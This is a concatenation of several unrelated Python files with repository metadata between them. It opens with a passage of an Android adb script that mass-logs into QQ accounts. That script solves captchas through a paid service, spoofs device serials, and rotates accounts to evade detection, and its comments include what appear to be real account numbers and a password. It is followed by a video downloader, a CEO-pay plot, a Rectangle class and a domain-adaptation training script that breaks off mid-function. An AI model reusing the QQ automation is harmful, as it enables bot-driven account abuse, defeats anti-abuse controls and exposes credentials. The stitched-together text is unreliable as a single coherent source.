z.sleep(10)
numbers = self.repo.GetAccount(cate_id, time_limit1, 1)
QQNumber = numbers[0]['number'] # 即将登陆的QQ号
QQPassword = numbers[0]['password']
print('QQ号是:%s,QQ密码是:%s'%(QQNumber,QQPassword))
d.server.adb.cmd("shell", "pm clear com.tencent.eim").communicate() # 清除缓存
d.server.adb.cmd("shell", "am start -n com.tencent.eim/com.tencent.mobileqq.activity.SplashActivity").communicate() # 拉起来
z.sleep(3)
while d(textContains='正在更新').exists:
z.sleep(2)
z.sleep(5)
z.heartbeat()
d(className='android.widget.Button', index=1, clickable='true').click()
z.sleep(2)
d(className='android.widget.EditText', text='企业QQ号/手机号/邮箱').set_text(QQNumber) # 3001313499 QQNumber 3001346198
d(resourceId='com.tencent.eim:id/password', description='请输入密码').set_text(QQPassword) # Bn2kJq5l QQPassword
d(text='登 录').click()
z.sleep(4)
if d(text='企业QQ').exists:
d(text='企业QQ').click()
if d(text='仅此一次').exists:
d(text='仅此一次').click()
z.heartbeat()
if d(text='搜索').exists: # 直接登陆成功的情况
return QQNumber # 放到方法里改为return
if d(text='帐号无法登录', resourceId='com.tencent.eim:id/dialogTitle').exists: # 帐号被冻结
self.repo.BackupInfo(cate_id, 'frozen', QQNumber, '','')
break
icode = imageCode()
im_id = ""
for i in range(0, 30, +1): # 打码循环
if i > 0:
icode.reportError(im_id)
obj = d(resourceId='com.tencent.eim:id/name', className='android.widget.ImageView')
obj = obj.info
obj = obj['bounds'] # 验证码处的信息
left = obj["left"] # 验证码的位置信息
top = obj['top']
right = obj['right']
bottom = obj['bottom']
d.screenshot(sourcePng) # 截取整个输入验证码时的屏幕
img = Image.open(sourcePng)
box = (left, top, right, bottom) # left top right bottom
region = img.crop(box) # 截取验证码的图片
img = Image.new('RGBA', (right - left, bottom - top))
img.paste(region, (0, 0))
img.save(codePng)
im = open(codePng, 'rb')
codeResult = icode.getCode(im, icode.CODE_TYPE_4_NUMBER_CHAR)
code = codeResult["Result"]
im_id = codeResult["Id"]
os.remove(sourcePng)
os.remove(codePng)
z.heartbeat()
d(resourceId='com.tencent.eim:id/name', index='2', className="android.widget.EditText").set_text(code)
z.sleep(1)
d(text='完成').click()
z.sleep(4)
while d(className='android.widget.ProgressBar',index=0).exists: #网速较慢,校验验证码未完成的情况
z.heartbeat()
z.sleep(2)
if d(text='搜索', resourceId='com.tencent.eim:id/name').exists:
return QQNumber# 放到方法里改为return
if d(text='输入验证码').exists: #验证码输入错误的情况
z.heartbeat()
continue
else:
self.repo.BackupInfo(cate_id, 'frozen', QQNumber,'') # 仓库号,使用中,QQ号,设备号_卡槽号
break
def action(self, d,z, args):
z.heartbeat()
time_limit = args['time_limit']
cate_id = args["repo_cate_id"]
slotnum = self.slot.getEmpty(d) # 取空卡槽
print(slotnum)
if slotnum == 0:
slotnum = self.slot.getSlot(d, time_limit) # 没有空卡槽,取time_limit小时没用过的卡槽
while slotnum == 0: # 2小时没有用过的卡槽也为空的情况
d.server.adb.cmd("shell", "am broadcast -a com.zunyun.zime.toast --es msg \"EIM卡槽全满,无间隔时间段未用\"").communicate()
z.heartbeat()
z.sleep(30)
slotnum = self.slot.getSlot(d, time_limit)
d.server.adb.cmd("shell", "pm clear com.tencent.eim").communicate() # 清除缓存
d.server.adb.cmd("shell", "settings put global airplane_mode_on 1").communicate()
d.server.adb.cmd("shell", "am broadcast -a android.intent.action.AIRPLANE_MODE --ez state true").communicate()
z.sleep(5)
getSerial = self.repo.Getserial(cate_id,'%s_%s_%s' % (d.server.adb.device_serial(), self.type, slotnum)) # 得到之前的串号
if len(getSerial) == 0: # 之前的信息保存失败的话
d.server.adb.cmd("shell", "am broadcast -a com.zunyun.zime.toast --es msg \"串号获取失败,重新设置\"").communicate() # 在51上测时库里有东西但是王红机器关闭后仍获取失败
getSerial = z.generateSerial("788") # 修改信息
else:
getSerial = getSerial[0]['imei'] #如果信息保存成功但串号没保存成功的情况
print('卡槽切换时的sereial%s'%getSerial)
if getSerial is None: #如果串号为空,在该卡槽下保存新的串号
getSerial = z.generateSerial("788") # 修改信息
else:
z.generateSerial(getSerial) # 将串号保存
z.heartbeat()
self.slot.restore(d, slotnum) # 有2小时没用过的卡槽情况,切换卡槽
print("切换为" + str(slotnum))
d.server.adb.cmd("shell", "settings put global airplane_mode_on 0").communicate()
d.server.adb.cmd("shell", "am broadcast -a android.intent.action.AIRPLANE_MODE --ez state false").communicate()
z.heartbeat()
while True:
ping = d.server.adb.cmd("shell", "ping -c 3 baidu.com").communicate()
print(ping)
if 'icmp_seq'and 'bytes from'and'time' in ping[0]:
break
z.sleep(2)
d.server.adb.cmd("shell", "am start -n com.tencent.eim/com.tencent.mobileqq.activity.SplashActivity").communicate() # 先将eim拉起来
z.heartbeat()
z.sleep(2)
while d(textContains='正在更新数据').exists:
z.sleep(2)
z.sleep(4)
z.toast('卡槽成功切换为%s号'%slotnum)
z.sleep(10)
if d(text='下线通知').exists:
d(text='重新登录').click()
if d(textContains='开启精彩').exists:
d(textContains='开启精彩').click()
if d(descriptionContains='开启精彩').exists:
d(descriptionContains='开启精彩').click()
if d(resourceId='com.tencent.eim:id/name', className='android.widget.Button').exists: # 点击开始体验
d(resourceId='com.tencent.eim:id/name', className='android.widget.Button').click()
z.sleep(6)
if d(text='搜索').exists:
z.heartbeat()
QQnumber = self.slot.getSlotInfo(d, slotnum) # 得到切换后的QQ号
QQnumber = QQnumber['info'] # info为QQ号
self.slot.backup(d, slotnum, QQnumber) # 设备信息,卡槽号,QQ号
self.repo.BackupInfo(cate_id, 'using', QQnumber, getSerial, '%s_%s_%s' % (d.server.adb.device_serial(), self.type, slotnum)) # 仓库号,状态,QQ号,备注设备id_卡槽id
else: # 切换不成功的情况
z.heartbeat()
serialinfo = z.generateSerial("788") # 修改串号等信息
print('登陆时的serial%s' % serialinfo)
QQnumber = self.login(d, args,z)
self.slot.backup(d, slotnum, QQnumber) # 设备信息,卡槽号,QQ号
self.repo.BackupInfo(cate_id, 'using', QQnumber, serialinfo, '%s_%s_%s' % (d.server.adb.device_serial(), self.type, slotnum)) # 仓库号,使用中,QQ号,设备号_卡槽号
d.server.adb.cmd("shell", "pm clear com.tencent.eim").communicate() # 清除缓存
gener = args['kind']
if gener == '普通QQ':
self.slot.restore(d, slotnum, "com.tencent.mobileqq") # 有2小时没用过的卡槽情况,切换卡槽
print("切换为"+str(slotnum))
z.toast('切换为%s号卡槽' % slotnum)
d.server.adb.cmd("shell", "am start -n com.tencent.mobileqq/com.tencent.mobileqq.activity.SplashActivity").communicate() # 拉起来
z.heartbeat()
z.sleep(2)
while d(textContains='正在更新').exists:
z.sleep(2)
z.sleep(10)
if d(text='重新登录').exists:
d(text='重新登录').click()
z.sleep(10)
if d(text='马上升级').exists:
d(description='取消').click()
z.sleep(10)
if d(text='搜索') or d(textContains='消息') or d(text='主题装扮') or d(text='启用') or d(text='马上绑定') or d(text='寻找好友') or d(text='马上升级') or d(text='通讯录').exists:
z.heartbeat()
obj = self.slot.getSlotInfo(d, slotnum) # 得到切换后的QQ号
QQnumber = obj['info'] # info为QQ号
self.slot.backup(d, slotnum, QQnumber) # 设备信息,卡槽号,QQ号
self.repo.BackupInfo(cate_id, 'using', QQnumber, getSerial, '%s_%s_%s' % (d.server.adb.device_serial(), self.type, slotnum)) # 仓库号,状态,QQ号,备注设备id_卡槽id
#在文档的备用里有删除的代码
else: # 切换不成功的情况
z.heartbeat()
serialinfo = z.generateSerial("788") # 修改串号等信息
print('登陆时的serial%s' % serialinfo)
QQnumber = self.login(d, args,z)
z.heartbeat()
self.slot.backup(d, slotnum, QQnumber) # 设备信息,卡槽号,QQ号
self.repo.BackupInfo(cate_id, 'using', QQnumber, serialinfo, '%s_%s_%s' % (d.server.adb.device_serial(), self.type, slotnum)) # 仓库号,使用中,QQ号,设备号_卡槽号
d.server.adb.cmd("shell", "pm clear com.tencent.eim").communicate() # 清除缓存
self.slot.restore(d, slotnum, "com.tencent.mobileqq") # 有2小时没用过的卡槽情况,切换卡槽
z.toast('切换为%s号卡槽' % slotnum)
d.server.adb.cmd("shell", "am start -n com.tencent.mobileqq/com.tencent.mobileqq.activity.SplashActivity").communicate() # 拉起来
z.heartbeat()
z.sleep(2)
while d(textContains='正在更新').exists:
z.sleep(2)
z.sleep(8)
else:
self.slot.restore(d, slotnum, "com.tencent.qqlite") # 有2小时没用过的卡槽情况,切换卡槽
z.toast('切换为%s号卡槽' % slotnum)
print("切换为"+str(slotnum))
d.server.adb.cmd("shell", "am start -n com.tencent.qqlite/com.tencent.mobileqq.activity.SplashActivity").communicate() # 拉起来
z.heartbeat()
z.sleep(2)
while d(textContains='正在更新').exists:
z.sleep(2)
z.sleep(8)
if d(text='消息') or d(text='启用') or d(text='联系人').exists:
z.heartbeat()
obj = self.slot.getSlotInfo(d, slotnum) # 得到切换后的QQ号
QQnumber = obj['info'] # info为QQ号
self.slot.backup(d, slotnum, QQnumber) # 设备信息,卡槽号,QQ号
self.repo.BackupInfo(cate_id, 'using', QQnumber, getSerial, '%s_%s_%s' % (
d.server.adb.device_serial(), self.type, slotnum)) # 仓库号,状态,QQ号,备注设备id_卡槽id
else:
z.heartbeat()
serialinfo = z.generateSerial("788") # 修改串号等信息
print('登陆时的serial%s' % serialinfo)
QQnumber = self.login(d, args,z)
z.heartbeat()
self.slot.backup(d, slotnum, QQnumber) # 设备信息,卡槽号,QQ号
self.repo.BackupInfo(cate_id, 'using', QQnumber, serialinfo, '%s_%s_%s' % (d.server.adb.device_serial(), self.type, slotnum)) # 仓库号,使用中,QQ号,设备号_卡槽号
d.server.adb.cmd("shell", "pm clear com.tencent.eim").communicate() # 清除缓存
self.slot.restore(d, slotnum, "com.tencent.qqlite") # 有2小时没用过的卡槽情况,切换卡槽
z.toast('切换为%s号卡槽' % slotnum)
d.server.adb.cmd("shell", "am start -n com.tencent.qqlite/com.tencent.mobileqq.activity.SplashActivity").communicate() # 拉起来
z.heartbeat()
z.sleep(2)
while d(textContains='正在更新').exists:
z.sleep(2)
z.sleep(8)
else: # 有空卡槽的情况
d.server.adb.cmd("shell", "settings put global airplane_mode_on 1").communicate()
d.server.adb.cmd("shell", "am broadcast -a android.intent.action.AIRPLANE_MODE --ez state true").communicate()
z.sleep(6)
d.server.adb.cmd("shell", "settings put global airplane_mode_on 0").communicate()
d.server.adb.cmd("shell", "am broadcast -a android.intent.action.AIRPLANE_MODE --ez state false").communicate()
z.heartbeat()
while True:
ping = d.server.adb.cmd("shell", "ping -c 3 baidu.com").communicate()
print(ping)
if 'icmp_seq'and 'bytes from'and'time' in ping[0]:
break
z.sleep(2)
z.heartbeat()
serialinfo = z.generateSerial("788") # 修改串号等信息
print('登陆时的serial%s' % serialinfo)
QQnumber = self.login(d, args,z)
z.sleep(3)
z.heartbeat()
self.slot.backup(d, slotnum, QQnumber) # 设备信息,卡槽号,QQ号
self.repo.BackupInfo(cate_id, 'using', QQnumber,serialinfo,'%s_%s_%s' % (d.server.adb.device_serial(),self.type, slotnum)) # 仓库号,使用中,QQ号,设备号_卡槽号
d.server.adb.cmd("shell", "pm clear com.tencent.eim").communicate() # 清除缓存
# d.server.adb.cmd("shell", "am force-stop com.tencent.eim").communicate() # 强制停止 3001369923 Bn2kJq5l
gener = args['kind']
if gener == '普通QQ':
self.slot.restore(d, slotnum, "com.tencent.mobileqq") # 有2小时没用过的卡槽情况,切换卡槽
z.toast('切换为%s号卡槽'%slotnum)
d.server.adb.cmd("shell", "am start -n com.tencent.mobileqq/com.tencent.mobileqq.activity.SplashActivity").communicate() # 拉起来
z.heartbeat()
z.sleep(2)
while d(textContains='正在更新').exists:
z.sleep(2)
z.sleep(8)
else: #轻聊版
self.slot.restore(d, slotnum, "com.tencent.qqlite") # 有2小时没用过的卡槽情况,切换卡槽
z.toast('切换为%s号卡槽' % slotnum)
d.server.adb.cmd("shell", "am start -n com.tencent.qqlite/com.tencent.mobileqq.activity.SplashActivity").communicate() # 拉起来
z.heartbeat()
z.sleep(2)
while d(textContains='正在更新').exists:
z.sleep(2)
z.sleep(8)
print("切换为" + str(slotnum))
if (args["time_delay"]):
z.sleep(int(args["time_delay"]))
def getPluginClass():
return EIMCutQQ
if __name__ == "__main__":
import sys
reload(sys)
sys.setdefaultencoding('utf8')
clazz = getPluginClass()
d = Device("HT4AVSK00981")
z = ZDevice("HT4AVSK00981")
d.server.adb.cmd("shell", "ime set com.zunyun.qk/.ZImeService").communicate()
args = {"repo_cate_id":"34","time_limit":"30","time_limit1":"10","kind":"普通QQ","time_delay":"3"}; #cate_id是仓库号,length是数量
o = clazz()
o.action(d,z, args)
|
[
"you@example.com"
] |
you@example.com
|
87dcad0d60cbcbc97e6aa81de84ab0345fc6ac0e
|
7e9430ab914d75f40850e8a80455a2a7c02a0871
|
/download_video.py
|
c276d917d90a97f60d0202518affad28c9a9bd20
|
[] |
no_license
|
kyle8581/YSCEC_video_download
|
86d1de7dede6d0a88f3f80b52f9aa2bd435fc4ea
|
ff8267ee7347a0af7b077dce864f0725dd940cf1
|
refs/heads/master
| 2022-12-15T23:46:15.197704
| 2020-09-21T07:46:05
| 2020-09-21T07:46:05
| 295,901,708
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 597
|
py
|
import requests
from download_chunklist import get_chunklist
BASE_URL = input("가져온 URL에서 /media_**.ts 부분을 제외하고 입력해 주세요 : ")
OUTPUT_FILE_NAME = input("생성할 비디오 파일명을 입력해 주세요 (ex. yonsei.mp4) : ")
chunk_size = 256
chunk_list = get_chunklist(BASE_URL+"/chunklist.m3u8")
with open(OUTPUT_FILE_NAME,'wb') as f:
for ts in chunk_list:
cur_url = BASE_URL+"/"+ts
r = requests.get(cur_url, stream=True)
for chunk in r.iter_content(chunk_size= chunk_size):
f.write(chunk)
print(ts+"...ok")
|
[
"mapoout@naver.com"
] |
mapoout@naver.com
|
bc1b83d6e902871ab6739786405a1625f4cf20ed
|
7ffff207e11464af0c3a61a917a7dd0df09e27a1
|
/ceo_compensation/dot_pairs_ceo_compensation.py
|
d3ebe9dd441efe06cf2143e3eb81a5e6b7c8e818
|
[
"MIT"
] |
permissive
|
aaronpenne/data_visualization
|
082100f8c401ee3ba403d116f98deada0d4d804a
|
8eb84303e5de4ec4b407432a823869cbb9099bc2
|
refs/heads/master
| 2022-09-16T01:12:27.101444
| 2022-08-02T05:30:22
| 2022-08-02T05:30:22
| 108,087,423
| 356
| 76
|
MIT
| 2020-11-30T22:23:06
| 2017-10-24T06:42:06
|
Python
|
UTF-8
|
Python
| false
| false
| 2,903
|
py
|
# -*- coding: utf-8 -*-
"""
Attempting to improve this: https://www.reddit.com/r/dataisbeautiful/comments/842tvn/highestpaid_ceos_in_america_oc/
Author: Aaron Penne
Created: 2018-03-13
Developed with:
Python 3.6
Windows 10
"""
import pandas as pd
import matplotlib.pyplot as plt
import os
# Set output directory, make it if needed
output_dir = os.path.realpath(r'C:\tmp\ceo') # Windows machine
if not os.path.isdir(output_dir):
os.mkdir(output_dir)
# Get input data
input_file = os.path.realpath(r'C:\tmp\data_ceo_compensation.txt')
df = pd.read_csv(input_file)
df = df.sort_values(['annual_compensation'])
df = df.reset_index(drop=True)
# Normalize to M and B
df['annual_compensation'] = df['annual_compensation']/1000000
df['annual_revenue'] = df['annual_revenue']/1000000000
fig, ax = plt.subplots(figsize=(8, 6), dpi=150)
for i in df.index:
x = [df.loc[i,'annual_compensation'], df.loc[i, 'annual_revenue']]
y = [i, i]
print(x, y)
plt.plot(x, y,
color='gray',
linestyle='-',
linewidth=1)
if x[0] > x[1]:
plt.text(x[0]+4, y[0], df.loc[i, 'ceo'], horizontalalignment='left', verticalalignment='center', weight='bold')
plt.text(x[1]-4, y[1], df.loc[i, 'company'], horizontalalignment='right', verticalalignment='center')
else:
plt.text(x[0]-4, y[0], df.loc[i, 'ceo'], horizontalalignment='right', verticalalignment='center', weight='bold')
plt.text(x[1]+4, y[1], df.loc[i, 'company'], horizontalalignment='left', verticalalignment='center')
# Plot revenue
x = df.loc[:,'annual_compensation']
y = df.index
plt.plot(x, y,
color='#65C2A5',
linestyle='None',
marker='o',
markersize=7,
fillstyle='full')
# Plot company
x = df.loc[:,'annual_revenue']
y = df.index
plt.plot(x, y,
color='#FC8D62',
linestyle='None',
marker='o',
markersize=7,
fillstyle='full')
# Despine
for side in ['right', 'left', 'top', 'bottom']:
ax.spines[side].set_visible(False)
plt.ylim([-1, 13])
plt.xlim([-50, 150])
plt.xticks(range(0,101,10), color='gray')
ax.set_yticklabels('')
plt.text(-50, 12, 'Annual Company Revenue and Annual CEO Compensation',
horizontalalignment='left',
size=16,
weight='bold')
plt.text(-50, 11, 'Company revenue is in $Billions.',
horizontalalignment='left',
color='#FC8D62',
size=14)
plt.text(42, 11, 'CEO compensation is in $Millions.',
horizontalalignment='left',
color='#65C2A5',
size=14)
plt.text(-50, -3, '© 2018 Aaron Penne\nSource: u/k0m0d0z0',
horizontalalignment='left',
color='gray',
size=8)
# Reveal
plt.show()
# Save
fig.savefig(os.path.join(output_dir, 'dot_pairs_ceo.png'),
dpi=fig.dpi,
bbox_inches='tight',
pad_inches=0.3)
|
[
"aaronpenne@users.noreply.github.com"
] |
aaronpenne@users.noreply.github.com
|
402912bcb5d4de24217c9ca835f0151bdfa497d1
|
5daebb0caaf282149f0bd0f063f3cf91c0d222b5
|
/0x08-python-more_classes/3-rectangle.py
|
69774ab43dfd88ea60794d956cbf3e1a6184a04f
|
[] |
no_license
|
yacinekedidi/holbertonschool-higher_level_programming
|
0ad09a6263ccf2a75f5f5e83fb6c219a0935818e
|
a970ba4e737524f433be6b7654809ffff4d1168e
|
refs/heads/master
| 2022-12-20T10:58:57.770269
| 2020-09-24T12:33:51
| 2020-09-24T12:33:51
| 259,281,605
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,470
|
py
|
#!/usr/bin/python3
"""module contains a function.
"""
class Rectangle:
"""
Defines a rectangle
"""
def __init__(self, width=0, height=0):
self.width = width
self.height = height
def __str__(self):
s = ""
if self.__width == 0 or self.__height == 0:
return s
for i in range(self.__height):
for j in range(self.__width):
s += "#"
s += "\n"
return s[:-1]
@property
def height(self):
return self.__height
@height.setter
def height(self, value):
if type(value) is not int:
raise TypeError("height must be an integer")
if value < 0:
raise ValueError("height must be >= 0")
self.__height = value
@property
def width(self):
return self.__width
@width.setter
def width(self, value):
if type(value) is not int:
raise TypeError("width must be an integer")
if value < 0:
raise ValueError("width must be >= 0")
self.__width = value
def area(self):
"""
function returns the area of the rectangle
"""
return self.__width * self.__height
def perimeter(self):
"""
function that returns the perimeter of the rectangle
"""
if (self.__height == 0 or self.__width == 0):
return (0)
return 2 * (self.__width + self.__height)
|
[
"kedidiyacine@gmail.com"
] |
kedidiyacine@gmail.com
|
944d89ed198b9de755b4dfd5d45e7c18ecf79503
|
05881f001e96ecc32013c96cf5d13b0e008c7f4e
|
/Train/transfer_0826.py
|
92cff5e0d343ed07785aca6477c120f51ec3cae6
|
[] |
no_license
|
cht619/Domain-Adaption
|
0c22b6f1e2f0f5670c41870d8f4096d8ab551f77
|
e53d89237c2fc8137b57e7bd11d4cdcb669cd15f
|
refs/heads/master
| 2022-12-09T08:29:26.055453
| 2020-08-26T04:20:11
| 2020-08-26T04:20:11
| 290,379,279
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,694
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/8/26 9:21
# @Author : CHT
# @Blog : https://www.zhihu.com/people/xia-gan-yi-dan-chen-hao-tian
# @Site :
# @File : transfer_0826.py
# @Function: 主要修改损失函数
# @Software: PyCharm
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd.variable import *
import os
from collections import *
import params
import time
from utils import *
from torchvision.utils import save_image
FloatTensor = torch.cuda.FloatTensor
LongTensor = torch.cuda.LongTensor
def train(discriminator, classifier, dataloader_src, dataloader_tgt, train_epochs, domain_label, loss_weight):
"""
:param domain_label:
:param train_epochs:
:param discriminator:
:param classifier:
:param dataloader_src:
:param dataloader_tgt:
"""
discriminator.train()
classifier.train()
loss_d = torch.nn.BCELoss()
# loss_d = torch.nn.MSELoss()
loss_c = torch.nn.CrossEntropyLoss()
scheduler = lambda step, initial_lr: inverseDecaySheduler(step, initial_lr, gamma=10, power=0.75, max_iter=3000)
optimizer_c = OptimWithSheduler(optim.Adam(classifier.parameters(), weight_decay=5e-4, lr=1e-5),
scheduler)
optimizer_d = OptimWithSheduler(optim.Adam(discriminator.parameters(), weight_decay=5e-4, lr=1e-5),
scheduler)
# 各种loss和距离,保存下来画图
sample_distance_src = []
sample_distance_tgt = []
discriminator_loss = []
discriminator_f_loss = []
classifier_loss = []
classifier_f_loss = []
epochs = []
len_dataloader = min(len(dataloader_src), len(dataloader_tgt))
for epoch in range(train_epochs[0]):
start = time.time()
data_zip = enumerate(zip(dataloader_src, dataloader_tgt))
for st, ((imgs_src, labels_src), (imgs_tgt, labels_tgt)) in data_zip:
# adjust_lr(optimizer_c, step, optimizer_c.param_groups[0]['lr'])
# adjust_lr(optimizer_d, step, optimizer_d.param_groups[0]['lr'])
# =========================generate transferable examples
feature_fooling_src = Variable(
imgs_src.type(FloatTensor), requires_grad=True).reshape(imgs_src.shape[0], -1)
labels_src = Variable(labels_src.type(LongTensor))
feature_fooling_src0 = feature_fooling_src.detach() # 保留原始图片数据,方便计算
feature_fooling_tgt = Variable(
imgs_tgt.type(FloatTensor), requires_grad=True).reshape(imgs_tgt.shape[0], -1)
feature_fooling_tgt0 = feature_fooling_tgt.detach() # 保留原始图片数据,方便计算
for i_t in range(train_epochs[1]):
# Target Domain
# 更新 feature_fooling_tgt
discriminator.zero_grad()
classifier.zero_grad()
scores = discriminator(feature_fooling_tgt)
loss_d_ = loss_d(1 - scores, torch.ones_like(scores)) - 0.1 * torch.sum(
(feature_fooling_tgt - feature_fooling_tgt0) * (feature_fooling_tgt - feature_fooling_tgt0))
feature_fooling_tgt.retain_grad()
loss_d_.backward()
# get grad
g = feature_fooling_tgt.grad
feature_fooling_tgt = feature_fooling_tgt + 2*g
# optimizer_d.step()
# 得到更新后的图像
feature_fooling_tgt = Variable(feature_fooling_tgt, requires_grad=True)
for i_s in range(train_epochs[2]):
# Source Domain -Discriminator
# 更新 feature_fooling_src
discriminator.zero_grad()
classifier.zero_grad()
scores = discriminator(feature_fooling_src)
loss_d_ = loss_d(scores, torch.ones_like(scores)) - 0.1 * torch.sum(
(feature_fooling_src - feature_fooling_src0) * (feature_fooling_src - feature_fooling_src0))
feature_fooling_src.retain_grad()
loss_d_.backward()
gss = feature_fooling_src.grad
feature_fooling_src = feature_fooling_src + 2*gss
# optimizer_d.step()
feature_fooling_src = Variable(feature_fooling_src, requires_grad=True)
for i_c in range(train_epochs[3]):
# source domain -Classifier
# 更新后的feature_fooling_src 要能被classifier正确分类
discriminator.zero_grad()
classifier.zero_grad()
pred = classifier.forward(feature_fooling_src)
loss_c_ = loss_c(pred, labels_src) - 0.1 * torch.sum(
(feature_fooling_src - feature_fooling_src0) * (feature_fooling_src - feature_fooling_src0))
loss_c_.backward()
gs = feature_fooling_src.grad
feature_fooling_src = feature_fooling_src + 3 * gs
feature_fooling_src = Variable(feature_fooling_src, requires_grad=True)
# 前向传播
feature_src = Variable(
imgs_src.type(FloatTensor), requires_grad=False).reshape(imgs_src.shape[0], -1)
labels_src = Variable(labels_src.type(LongTensor))
feature_tgt = Variable(
imgs_tgt.type(FloatTensor), requires_grad=False).reshape(imgs_tgt.shape[0], -1)
labels_tgt = Variable(labels_tgt.type(LongTensor))
# classifier output
predict_prob_src = classifier(feature_src)
predict_prob_tgt = classifier(feature_tgt)
# discriminator output
domain_src = discriminator(feature_src)
domain_tgt = discriminator(feature_tgt)
domain_f_tgt = discriminator(feature_fooling_tgt)
domain_f_src = discriminator(feature_fooling_src)
# 计算loss domain_src
domain_label_src = Variable(FloatTensor(imgs_src.size(0), 1).fill_(domain_label[0]))
domain_label_tgt = Variable(FloatTensor(imgs_tgt.size(0), 1).fill_(domain_label[1]))
domain_label_f_src = Variable(FloatTensor(imgs_src.size(0), 1).fill_(domain_label[2]))
domain_label_f_tgt = Variable(FloatTensor(imgs_tgt.size(0), 1).fill_(domain_label[3]))
dloss_f = (loss_d(domain_f_src.detach(), domain_label_f_src) +
loss_d(domain_f_tgt.detach(), domain_label_f_tgt))
dloss = loss_d(domain_src, domain_label_src) + \
loss_d(domain_tgt, domain_label_tgt)
# loss_c_src = loss_c(predict_prob_src, labels_src) + loss_c(predict_prob_tgt, labels_tgt)
loss_c_src = loss_c(predict_prob_src, labels_src)
entropy = entropy_loss(predict_prob_tgt)
# 这是更新后生成的图片的损失
predict_prob_f_src = classifier(feature_fooling_src)
predict_prob_f_tgt = classifier(feature_fooling_tgt)
dis = torch.sum((predict_prob_f_tgt - predict_prob_tgt) *
(predict_prob_f_tgt - predict_prob_tgt))
loss_c_f_src = loss_c(predict_prob_f_src, labels_src)
with OptimizerManager([optimizer_c, optimizer_d]):
loss = loss_weight[0] * loss_c_src + loss_weight[1] * dloss + loss_weight[2] * dloss_f + \
loss_weight[3] * loss_c_f_src + loss_weight[4] * dis + loss_weight[5] * entropy
loss.backward()
if epoch % 20 == 0:
# 这里也把source domain准确率输出来看一下。
# target domain的准确率先不输出,因为现在效果还不是很好。
predict_prob_src, predict_prob_tgt = classifier(feature_src), classifier(feature_tgt)
pred_src, pred_tgt = predict_prob_src.data.max(1)[1], predict_prob_tgt.data.max(1)[1]
acc_src, acc_tgt = pred_src.eq(labels_src.data).cpu().sum(), pred_tgt.eq(labels_tgt.data).cpu().sum()
print(
"[Epoch {:d}/{:d}] [Batch {:d}/{:d}] [C loss: src:{:.3f}, f_src:{:.3f}] "
"[D loss src:{:.3f} f_src:{:.3f}] [Acc src:{:.2%} tgt:{:.2%}]"
"[dis:{:.3f} entropy:{:.3f}]"
.format(epoch, train_epochs[0],
st, len_dataloader,
loss_c_src.item(), loss_c_f_src.item(),
dloss.item(), dloss_f.item(),
int(acc_src) / 100, int(acc_tgt) / 100,
dis, entropy)
)
if epoch % 50 == 0:
acc_src = 0
for (imgs_src, labels_src) in dataloader_src:
feature_src = Variable(imgs_src.type(FloatTensor)).reshape(imgs_src.shape[0], -1)
labels_src = Variable(labels_src.type(LongTensor))
predict_prob_src = classifier(feature_src)
pred_src = predict_prob_src.data.max(1)[1]
acc_src += pred_src.eq(labels_src.data).cpu().sum()
print('epoch={}, src_acc={}'.format(epoch, int(acc_src) / len(dataloader_src.dataset)))
# 保存参数文件和distance,loss等信息。
# if epoch % 100 == 0 and epoch != 0:
# state = {'classifier': classifier.state_dict(), 'discriminator': discriminator.state_dict()}
# torch.save(state, '../pth/classifier_discriminator_{}.pth'.format(epoch))
# state = {'sample_distance_src': sample_distance_src, 'sample_distance_tgt': sample_distance_tgt,
# 'discriminator_loss': discriminator_loss, 'discriminator_f_loss': discriminator_f_loss,
# 'classifier_loss': classifier_loss, 'classifier_f_loss': classifier_f_loss,
# 'epochs': epochs}
# torch.save(state, '../pth/figure.pth')
def train_generate_samples(discriminator, classifier, dataloader_src, dataloader_tgt, train_epochs, domain_label,
loss_weight, save_samples_epoch):
"""
目的为了生成图片数据,其他功能暂时不理会。
迭代100次后开始生成图片
"""
os.makedirs('../generate_samples/A_C', exist_ok=True)
discriminator.train()
classifier.train()
loss_d = torch.nn.BCELoss()
loss_c = torch.nn.CrossEntropyLoss()
scheduler = lambda step, initial_lr: inverseDecaySheduler(step, initial_lr, gamma=10, power=0.75, max_iter=3000)
optimizer_c = OptimWithSheduler(optim.Adam(classifier.parameters(), weight_decay=5e-4, lr=1e-5),
scheduler)
optimizer_d = OptimWithSheduler(optim.Adam(discriminator.parameters(), weight_decay=5e-4, lr=1e-5),
scheduler)
len_dataloader = min(len(dataloader_src), len(dataloader_tgt))
for epoch in range(train_epochs[0]):
start = time.time()
data_zip = enumerate(zip(dataloader_src, dataloader_tgt))
for st, ((imgs_src, labels_src), (imgs_tgt, labels_tgt)) in data_zip:
# adjust_lr(optimizer_c, step, optimizer_c.param_groups[0]['lr'])
# adjust_lr(optimizer_d, step, optimizer_d.param_groups[0]['lr'])
# =========================generate transferable examples
feature_fooling_src = Variable(
imgs_src.type(FloatTensor), requires_grad=True).reshape(imgs_src.shape[0], -1)
labels_src = Variable(labels_src.type(LongTensor))
feature_fooling_src0 = feature_fooling_src.detach() # 保留原始图片数据,方便计算
feature_fooling_tgt = Variable(
imgs_tgt.type(FloatTensor), requires_grad=True).reshape(imgs_tgt.shape[0], -1)
feature_fooling_tgt0 = feature_fooling_tgt.detach() # 保留原始图片数据,方便计算
for i_t in range(train_epochs[1]):
# Target Domain
# 更新 feature_fooling_tgt
discriminator.zero_grad()
classifier.zero_grad()
scores = discriminator(feature_fooling_tgt)
loss_d_ = loss_d(1 - scores, torch.ones_like(scores)) - 0.1 * torch.sum(
(feature_fooling_tgt - feature_fooling_tgt0) * (feature_fooling_tgt - feature_fooling_tgt0))
feature_fooling_tgt.retain_grad()
loss_d_.backward()
# get grad
g = feature_fooling_tgt.grad
feature_fooling_tgt = feature_fooling_tgt + 2*g
# optimizer_d.step()
# 得到更新后的图像
feature_fooling_tgt = Variable(feature_fooling_tgt, requires_grad=True)
tgt_imgs_f = feature_fooling_tgt.reshape(feature_fooling_tgt.shape[0], 3, params.imgs_size, params.imgs_size)
for i_s in range(train_epochs[2]):
# Source Domain -Discriminator
# 更新 feature_fooling_src
discriminator.zero_grad()
classifier.zero_grad()
scores = discriminator(feature_fooling_src)
loss_d_ = loss_d(scores, torch.ones_like(scores)) - 0.1 * torch.sum(
